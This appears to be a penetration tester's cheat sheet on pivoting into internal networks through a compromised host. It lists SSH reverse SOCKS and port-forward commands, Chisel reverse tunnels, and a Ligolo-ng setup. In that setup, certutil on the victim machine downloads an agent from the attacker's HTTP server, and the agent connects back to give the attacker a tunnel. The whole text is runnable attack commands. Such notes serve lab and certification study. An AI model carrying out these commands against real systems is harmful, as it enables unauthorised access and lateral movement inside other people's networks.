SSH
Method 1 (reverse dynamic SOCKS):
On Kali machine:
sudo systemctl start ssh
nano /etc/proxychains.conf
# Append: socks5 127.0.0.1 <port>
# Prefix any command aimed at the internal network with proxychains from now on
On Victim machine:
ssh -N -R <port> kali@192.168.45.x
Method 2 (local port forward):
ssh <user>@<IP> -L <port>:127.0.0.1:<port>
# Target 127.0.0.1:<port> to access the target machine's "hidden" port
Chisel
On Kali machine:
./chisel_linux server -p 8001 --reverse
On Pivot machine:
.\chisel.exe client <Kali IP>:8001 R:3306:<Target IP>:3306
OR
.\chisel.exe client <Kali IP>:8001 R:socks
Ligolo-ng
Set up ligolo
On Kali Machine:
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <Internal net>/24 dev ligolo
mkdir ligolo && cd ligolo
mkdir proxy && cd proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
cd ..
mkdir agents && cd agents
mkdir windows && cd windows
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
cd ..
mkdir linux && cd linux
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
cd ..
python3 -m http.server 80
On MS01:
certutil -urlcache -split -f http://192.168.45.200/agents/<platform>/agent.exe
Initiate tunnel
On Kali Machine (in ~/ligolo/proxy):
./proxy -selfcert
# Take note of the port the proxy listens on
On MS01:
agent.exe -connect <kali IP>:<ligolo service port> -ignore-cert
# Default port is: 11601
Once Agent joins the Server, Return to Kali terminal:
session
<enter>
ifconfig # Verify interfaces of agent
start # Creates a tunnel that allows our kali to access the internal network
# Add listeners for whatever the internal network needs to reach you for; internal hosts connect to the pivot machine on <pivot port> and are forwarded to the destination
listener_add --addr 0.0.0.0:<pivot port> --to <destination IP>:<destination port>
listener_list # Verify listener added
Now you can reach the internal network directly, as if it were part of your own network.
The only difference is that the internal machines talk to your proxy (the pivot point) instead of directly to you.